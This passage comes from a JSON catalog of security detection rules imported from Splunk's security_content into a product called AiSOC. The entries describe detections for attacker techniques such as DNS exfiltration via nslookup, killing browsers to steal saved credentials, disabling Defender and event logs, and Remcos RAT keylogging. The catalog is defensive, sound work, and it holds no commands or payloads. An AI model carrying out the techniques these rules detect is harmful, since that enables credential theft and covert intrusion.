information, such as passwords and login data. This detection focuses on identifying taskkill commands targeting these browsers, signaling malicious intent. Early detection allows security teams to investigate and prevent further credential theft and system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-disable-or-stop-browser-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "220d34b7-b6c7-45fe-8dbb-c35cdd9fe6d5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_disable_or_stop_browser_process.yml" } }, { "id": "splunk-security-content-223572ab-8768-4e20-9b39-c38707af80dc", "type": "detection", "name": "Windows Account Access Removal via Logoff Exec", "description": "The following analytic detects the process of logging off a user through the use of the quser and logoff commands. By monitoring for these commands, the analytic identifies actions where a user session is forcibly terminated, which could be part of an administrative task or a potentially unauthorized access attempt. This detection helps identify potential misuse or malicious activity where a user\u2019s access is revoked without proper authorization, providing insight into potential security incidents involving account management or session manipulation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1531" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-account-access-removal-via-logoff-exec.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "223572ab-8768-4e20-9b39-c38707af80dc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_account_access_removal_via_logoff_exec.yml" } }, { "id": "splunk-security-content-2246c142-a678-45f8-8546-aaed7e0efd30", "type": "detection", "name": "O365 Elevated Mailbox Permission Assigned", "description": "The following analytic identifies the assignment of elevated mailbox permissions in an Office 365 environment via the Add-MailboxPermission operation. It leverages logs from the Exchange workload in the o365_management_activity data source, focusing on permissions such as FullAccess, ChangePermission, or ChangeOwner. This activity is significant as it indicates potential unauthorized access or control over mailboxes, which could lead to data exfiltration or privilege escalation. If confirmed malicious, attackers could gain extensive access to sensitive email data and potentially manipulate mailbox settings, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-elevated-mailbox-permission-assigned.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2246c142-a678-45f8-8546-aaed7e0efd30", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_elevated_mailbox_permission_assigned.yml" } }, { "id": "splunk-security-content-229dc225-6abe-4d28-89fd-edf874086162", "type": "detection", "name": "HTTP C2 Framework User Agent", "description": "This Splunk query analyzes web logs to identify and categorize user agents, detecting various types of c2 frameworks. This activity can signify malicious actors attempting to interact with hosts on the network using known default configurations of command and control tools.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/http-c2-framework-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "229dc225-6abe-4d28-89fd-edf874086162", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/http_c2_framework_user_agent.yml" } }, { "id": "splunk-security-content-22ac27b4-7189-4a4f-9375-b9017c9620d7", "type": "detection", "name": "Detect RTLO In Process", "description": "The following analytic identifies the abuse of the right-to-left override (RTLO) character (U+202E) in process names. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs and command-line data. This activity is significant because adversaries use the RTLO character to disguise malicious files or commands, making them appear benign. If confirmed malicious, this technique can allow attackers to execute harmful code undetected, potentially leading to unauthorized access, data exfiltration, or further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-rtlo-in-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "22ac27b4-7189-4a4f-9375-b9017c9620d7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_rtlo_in_process.yml" } }, { "id": "splunk-security-content-22c03600-f84a-47fa-abaa-ffbe3e72c782", "type": "detection", "name": "Linux Magic SysRq Key Abuse", "description": "Detects potential abuse of the Linux Magic SysRq (System Request) key by adversaries with root or sufficient privileges to manipulate or destabilize a system.\nWriting to /proc/sysrq-trigger can crash the system, kill processes, or bypass standard logging.\nMonitoring SysRq abuse helps detect stealthy post-exploitation activity.\nCorrelate with related EXECVE or PROCTITLE events to identify the process or user responsible for the access or modification.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.004", "T1529", "T1489", "T1499" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-magic-sysrq-key-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "22c03600-f84a-47fa-abaa-ffbe3e72c782", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_magic_sysrq_key_abuse.yml" } }, { "id": "splunk-security-content-22cc7a62-3884-48c4-82da-592b8199b72f", "type": "detection", "name": "ASL AWS Create Policy Version to allow all resources", "description": "The following analytic identifies the creation of a new AWS IAM policy version that allows access to all resources. It detects this activity by analyzing AWS CloudTrail logs for the CreatePolicyVersion event with a policy document that grants broad permissions. This behavior is significant because it violates the principle of least privilege, potentially exposing the environment to misuse or abuse. If confirmed malicious, an attacker could gain extensive access to AWS resources, leading to unauthorized actions, data exfiltration, or further compromise of the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-create-policy-version-to-allow-all-resources.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "22cc7a62-3884-48c4-82da-592b8199b72f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_create_policy_version_to_allow_all_resources.yml" } }, { "id": "splunk-security-content-22d3b118-04df-11ec-8fa3-acde48001122", "type": "detection", "name": "GetWmiObject DS User with PowerShell", "description": "The following analytic detects the execution of `powershell.exe` with command-line arguments used to query domain users via the `Get-WmiObject` cmdlet and `-class ds_user` parameter.\nThis detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions.\nThis activity is significant as it indicates potential reconnaissance efforts by adversaries to enumerate domain users, which is a common step in Active Directory Discovery.\nIf confirmed malicious, this could lead to further attacks, including privilege escalation and lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getwmiobject-ds-user-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "22d3b118-04df-11ec-8fa3-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getwmiobject_ds_user_with_powershell.yml" } }, { "id": "splunk-security-content-23150a40-9301-4195-b802-5bb4f43067fb", "type": "detection", "name": "Windows DisableAntiSpyware Registry", "description": "The following analytic detects the modification of the Windows Registry key \"DisableAntiSpyware\" being set to disable. This detection leverages data from the Endpoint.Registry datamodel, specifically looking for the registry value name \"DisableAntiSpyware\" with a value of \"0x00000001\". This activity is significant as it is commonly associated with Ryuk ransomware infections, indicating potential malicious intent to disable Windows Defender. If confirmed malicious, this action could allow attackers to disable critical security defenses, facilitating further malicious activities such as data encryption, exfiltration, or additional system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-disableantispyware-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "23150a40-9301-4195-b802-5bb4f43067fb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_disableantispyware_registry.yml" } }, { "id": "splunk-security-content-23587b6a-c479-11eb-b671-acde48001122", "type": "detection", "name": "Excessive distinct processes from Windows Temp", "description": "The following analytic identifies an excessive number of distinct processes executing from the Windows\\Temp directory. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process paths and counts within a 20-minute window. This behavior is significant as it often indicates the presence of post-exploit frameworks like Koadic and Meterpreter, which use this technique to execute malicious actions. If confirmed malicious, this activity could allow attackers to execute arbitrary code, escalate privileges, and maintain persistence within the environment, posing a severe threat to system integrity and security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/excessive-distinct-processes-from-windows-temp.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "23587b6a-c479-11eb-b671-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/excessive_distinct_processes_from_windows_temp.yml" } }, { "id": "splunk-security-content-236e7c8e-c9d9-11eb-a824-acde48001122", "type": "detection", "name": "Disable Logs Using WevtUtil", "description": "The following analytic detects the execution of \"wevtutil.exe\" with parameters to disable event logs. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. This activity is significant because disabling event logs is a common tactic used by ransomware to evade detection and hinder forensic investigations. If confirmed malicious, this action could allow attackers to operate undetected, making it difficult to trace their activities and respond effectively to the incident.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disable-logs-using-wevtutil.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "236e7c8e-c9d9-11eb-a824-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disable_logs_using_wevtutil.yml" } }, { "id": "splunk-security-content-237016fa-d8e6-47b4-80f9-70c4d42c72c0", "type": "detection", "name": "Windows Process Execution From ProgramData", "description": "The following analytic identifies processes running from file paths within\nthe ProgramData directory, a common location abused by adversaries for executing\nmalicious code while evading detection. Threat actors often drop and execute payloads\nfrom this directory to bypass security controls, as it typically has write permissions\nfor standard users. While this behavior can indicate malware execution or persistence\ntechniques, it is important to note that some legitimate software, installers, and\nupdate mechanisms also run from ProgramData, leading to potential false positives.\nSecurity teams should validate detections by correlating with other indicators,\nsuch as unusual parent processes, unsigned binaries, or anomalous network activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-process-execution-from-programdata.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "237016fa-d8e6-47b4-80f9-70c4d42c72c0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_process_execution_from_programdata.yml" } }, { "id": "splunk-security-content-238f3a07-8440-480b-b26f-462f41d9a47c", "type": "detection", "name": "Windows Masquerading Msdtc Process", "description": "The following analytic identifies the execution of msdtc.exe with specific command-line parameters (-a or -b), which are indicative of the PlugX malware. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. This activity is significant because PlugX uses these parameters to masquerade its malicious operations within legitimate processes, making it harder to detect. If confirmed malicious, this behavior could allow attackers to gain unauthorized access, exfiltrate data, and conduct espionage, severely compromising the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-masquerading-msdtc-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "238f3a07-8440-480b-b26f-462f41d9a47c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_masquerading_msdtc_process.yml" } }, { "id": "splunk-security-content-23add2a8-ea22-4fd4-8bc0-8c0b822373a1", "type": "detection", "name": "Windows Group Policy Object Created", "description": "The following analytic detects the creation of a new Group Policy Object (GPO) by leveraging Event IDs 5136 and 5137. This detection uses directory service change events to identify when a new GPO is created. Monitoring GPO creation is crucial as adversaries can exploit GPOs to escalate privileges or deploy malware across an Active Directory network. If confirmed malicious, this activity could allow attackers to control system configurations, deploy ransomware, or propagate malware, leading to widespread compromise and significant operational disruption.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.002", "T1484.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-group-policy-object-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "23add2a8-ea22-4fd4-8bc0-8c0b822373a1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_group_policy_object_created.yml" } }, { "id": "splunk-security-content-23e5b797-378d-45d6-ab3e-d034ca12a99b", "type": "detection", "name": "LLM Model File Creation", "description": "Detects the creation of Large Language Model (LLM) files on Windows endpoints by monitoring file creation events for specific model file formats and extensions commonly used by local AI frameworks.\nThis detection identifies potential shadow AI deployments, unauthorized model downloads, and rogue LLM infrastructure by detecting file creation patterns associated with quantized models (.gguf, .ggml), safetensors model format files, and Ollama Modelfiles.\nThese file types are characteristic of local inference frameworks such as Ollama, llama.cpp, GPT4All, LM Studio, and similar tools that enable running LLMs locally without cloud dependencies.\nOrganizations can use this detection to identify potential data exfiltration risks, policy violations related to unapproved AI usage, and security blind spots created by decentralized AI deployments that bypass enterprise governance and monitoring.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/llm-model-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "23e5b797-378d-45d6-ab3e-d034ca12a99b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/llm_model_file_creation.yml" } }, { "id": "splunk-security-content-23fb6787-255f-4d5b-9a66-9fd7504032b5", "type": "detection", "name": "Windows Disable Windows Event Logging Disable HTTP Logging", "description": "The following analytic detects the use of AppCmd.exe to disable HTTP logging on IIS servers. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution events where AppCmd.exe is used with specific parameters to alter logging settings. This activity is significant because disabling HTTP logging can help adversaries hide their tracks and avoid detection by removing evidence of their actions. If confirmed malicious, this could allow attackers to operate undetected, making it difficult to trace their activities and respond to the intrusion effectively.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.004", "T1562.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-disable-windows-event-logging-disable-http-logging.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "23fb6787-255f-4d5b-9a66-9fd7504032b5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_disable_windows_event_logging_disable_http_logging.yml" } }, { "id": "splunk-security-content-2418780f-7c3e-4c45-b8b4-996ea850cd49", "type": "detection", "name": "Windows System Discovery Using ldap Nslookup", "description": "The following analytic detects the execution of nslookup.exe to query domain information using LDAP. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. This activity is significant as nslookup.exe can be abused by malware like Qakbot to gather critical domain details, such as SRV records and server names. If confirmed malicious, this behavior could allow attackers to map the network, identify key servers, and plan further attacks, potentially leading to data exfiltration or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-system-discovery-using-ldap-nslookup.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2418780f-7c3e-4c45-b8b4-996ea850cd49", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_system_discovery_using_ldap_nslookup.yml" } }, { "id": "splunk-security-content-242e4d30-cb59-4051-b0cf-58895e218f40", "type": "detection", "name": "O365 User Consent Blocked for Risky Application", "description": "The following analytic identifies instances where Office 365 has blocked a user's attempt to grant consent to an application deemed risky or potentially malicious. This detection leverages O365 audit logs, specifically focusing on failed user consent actions due to system-driven blocks. Monitoring these blocked consent attempts is crucial as it highlights potential threats early on, indicating that a user might be targeted or that malicious applications are attempting to infiltrate the organization. If confirmed malicious, this activity suggests that O365's security measures successfully prevented a harmful application from accessing organizational data, warranting immediate investigation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1528" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-user-consent-blocked-for-risky-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "242e4d30-cb59-4051-b0cf-58895e218f40", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_user_consent_blocked_for_risky_application.yml" } }, { "id": "splunk-security-content-244a77bb-3b2a-46f1-bf2c-b4f7cd29276d", "type": "detection", "name": "Cisco Secure Firewall - Possibly Compromised Host", "description": "The following analytic highlights high-impact intrusion events assigned by Cisco Secure Firewall.\nThis detection leverages Cisco Secure Firewall Threat Defense logs and specifically the IntrusionEvent event type and `Impact` field assigned by Cisco Secure Firewall looking for an impact score of 1 or 2. If confirmed malicious this may indicate a potential compromised host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1203", "T1059", "T1587.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-possibly-compromised-host.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "244a77bb-3b2a-46f1-bf2c-b4f7cd29276d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___possibly_compromised_host.yml" } }, { "id": "splunk-security-content-2452e632-9e0d-11eb-bacd-acde48001122", "type": "detection", "name": "DNS Exfiltration Using Nslookup App", "description": "The following analytic identifies potential DNS exfiltration using the nslookup application. It detects specific command-line parameters such as query type (TXT, A, AAAA) and retry options, which are commonly used by attackers to exfiltrate data. The detection leverages Endpoint Detection and Response (EDR) telemetry, focusing on process execution logs. This activity is significant as it may indicate an attempt to communicate with a Command and Control (C2) server or exfiltrate sensitive data. If confirmed malicious, this could lead to data breaches and unauthorized access to critical information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/dns-exfiltration-using-nslookup-app.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2452e632-9e0d-11eb-bacd-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/dns_exfiltration_using_nslookup_app.yml" } }, { "id": "splunk-security-content-24869767-8579-485d-9a4f-d9ddfd8f0cac", "type": "detection", "name": "Process Execution via WMI", "description": "The following analytic detects the execution of a process by `WmiPrvSE.exe`, indicating potential use of WMI (Windows Management Instrumentation) for process creation. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and parent process relationships. This activity is significant as WMI can be used for lateral movement, remote code execution, or persistence by attackers. If confirmed malicious, this could allow an attacker to execute arbitrary commands or scripts, potentially leading to further compromise of the affected system or network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/process-execution-via-wmi.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "24869767-8579-485d-9a4f-d9ddfd8f0cac", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/process_execution_via_wmi.yml" } }, { "id": "splunk-security-content-24b2c2e3-2ff7-4a23-b814-87f8a62028cd", "type": "detection", "name": "Cisco Secure Firewall - Binary File Type Download", "description": "The following analytic detects file downloads involving executable, archive, or scripting-related file types that are commonly used in malware delivery.\nThese file types include formats like PE executables, shell scripts, autorun files, installers, and known testing samples such as EICAR.\nThis detection leverages Cisco Secure Firewall Threat Defense logs and enriches the results using a filetype lookup to provide context.\nIf confirmed malicious, these downloads could indicate the initial infection vector, malware staging, or scripting abuse.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1203", "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-binary-file-type-download.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "24b2c2e3-2ff7-4a23-b814-87f8a62028cd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___binary_file_type_download.yml" } }, { "id": "splunk-security-content-25212358-948e-11ec-ad47-acde48001122", "type": "detection", "name": "Windows Service Creation Using Registry Entry", "description": "The following analytic detects the modification of registry keys that define Windows services using reg.exe. This detection leverages Splunk to search for specific keywords in the registry path, value name, and value data fields. This activity is significant because it indicates potential unauthorized changes to service configurations, a common persistence technique used by attackers. If confirmed malicious, this could allow an attacker to maintain access, escalate privileges, or move laterally within the network, leading to data theft, ransomware, or other damaging outcomes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-service-creation-using-registry-entry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "25212358-948e-11ec-ad47-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_service_creation_using_registry_entry.yml" } }, { "id": "splunk-security-content-2593f641-6192-4f3d-b96c-2bd1c706215f", "type": "detection", "name": "Cisco Duo Policy Allow Network Bypass 2FA", "description": "The following analytic detects when a Duo policy is created or updated to allow network-based bypass of two-factor authentication (2FA).\nIt identifies this behavior by searching Duo administrator logs for policy creation or update actions where the networks_allow field is present,\nindicating that specific networks have been permitted to bypass 2FA requirements. This is achieved by parsing the event description and\nfiltering for relevant policy changes, then aggregating the results by user and administrator details. Detecting this behavior is critical\nfor a Security Operations Center (SOC) because allowing network-based 2FA bypass can significantly weaken authentication controls, potentially\nenabling unauthorized access if a trusted network is compromised or misconfigured. Attackers or malicious insiders may exploit this policy\nchange to circumvent 2FA protections, increasing the risk of account takeover and lateral movement within the environment. Prompt detection\nenables SOC analysts to investigate and respond to potentially risky policy modifications before they can be leveraged for malicious purposes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-duo-policy-allow-network-bypass-2fa.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2593f641-6192-4f3d-b96c-2bd1c706215f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_duo_policy_allow_network_bypass_2fa.yml" } }, { "id": "splunk-security-content-25ae862a-1ac3-11ec-94a1-acde48001122", "type": "detection", "name": "Remcos RAT File Creation in Remcos Folder", "description": "The following analytic detects the creation of files in the Remcos folder within the AppData directory, specifically targeting keylog and clipboard log files. It leverages the Endpoint.Filesystem data model to identify .dat files created in paths containing \"remcos.\" This activity is significant as it indicates the presence of the Remcos RAT, which performs keylogging, clipboard capturing, and audio recording. If confirmed malicious, this could lead to unauthorized data exfiltration and extensive surveillance capabilities for the attacker.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], 